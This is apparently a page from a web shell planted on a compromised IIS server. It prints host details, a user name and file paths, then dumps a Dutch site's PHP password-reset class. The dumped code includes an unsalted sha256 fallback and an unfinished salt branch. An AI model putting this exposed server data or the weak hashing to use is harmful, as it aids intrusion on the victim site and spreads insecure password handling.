HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
$ pwd: D:/HostingSpaces/SBogers10/komma-mediadesign.nl/wwwroot/beheer/app/models/login/
Upload Files
File: D:/HostingSpaces/SBogers10/komma-mediadesign.nl/wwwroot/beheer/app/models/login/m_passHandler.php
<?php

/*
	
	Handles all tasks required when a used forgets his password

*/

require_once DOCUMENT_ROOT.'app/models/login/m_password.php'; 

class PassHandler
{
	private $_pdo, $_template;
	
	public function __construct()
	{
		global $pdo, $template;
		
		$this->_pdo = $pdo;
		$this->_template = $template;
	}
	
	/**
	* gets the hash of the current password
	*
	* @access public
	* @param int
	* @return string / boolean
	*/ 
	public function get($userId)
	{
		if( ! empty($userId))
		{
			// build query
			$query = 'SELECT hash FROM kms_admin WHERE id = ?';
			
			// prepare statement
			if($st = $this->_pdo->prepare($query))
			{
				$st->bindParam(1, $userId);
				$st->execute();
				
				$result = $st->fetch(PDO::FETCH_OBJ);
				
				return $result->hash;
			}
		}
		return FALSE;
	}
	
	
	/**
	* Stores a new password in the database
	*
	* @access public
	* @param string, string, string
	* @return null
	*/
	public function update($new, $confirm, $actHash)
	{
		if( ! empty($new) && ! empty($confirm))
		{
			$password = new Password(array(
			'minLength'      => 8,
			'maxLength'      => 30,
			'minNumbers'     => 1,
			'minLetters'     => 1,
			'minLowerCase'   => 1,
			'minUpperCase'   => 1,
			'minSymbols'     => 1,
			'maxSymbols'     => 10,
			'allowedSymbols' => array('#', '_', '-', '!', '?', '@', '[', ']', '=', '~', '*'),));
			if($password->validatePassword($new))
			{
				if($new == $confirm)
				{
					// get email
					$activation = new Activation(); 
					if($actData = $activation->get($actHash))
					{
						// get user id 
						$user = new User();
						$userData = $user->getData('email',$actData['email']);
						
						// prepare new hash
						$newHash = $this->prepare($new, $userData['id']);
						
						// update new hash
						$updateQuery = 'UPDATE kms_admin SET hash = ? WHERE id = ? LIMIT 1';
						
						if($stUpdate = $this->_pdo->prepare($updateQuery))
						{
							$stUpdate->bindParam(1, $newHash);
							$stUpdate->bindParam(2, $userData['id']);
						
							if($stUpdate->execute())
							{
								return TRUE;
							}
						}
					}
				}
				else
				{
					$this->_template->setAlert('Uw wachtwoorden komen niet over&eacute;&eacute;n', 'error');	
				}
			}
			else
			{
				$errors = $password->getErrors();
				foreach($errors as $error)
				{
					$this->_template->setAlert($error, 'error');	
				}	
			}
		}
		else
		{
			$this->_template->setAlert('Vul beide velden in a.u.b.', 'warning');	
		}
		
		return FALSE;
	}
	
	/**
	* Encrypt Password
	*
	* @access private
	* @param string
	* @return string
	*/
	private function prepare($pass, $userId)
	{
		if(version_compare(PHP_VERSION, '5.3.0') >= 0)
		{
			if($currentHash = $this->get($userId))
			{		
				$newHash = crypt($pass, $currentHash);
			}
			else
			{
				// todo crypt with salt (for new passwords)	
			}
		}
		else
		{
			$newHash = hash('sha256', $pass);	
		}
		
		return $newHash;
	}
}
@ Telegram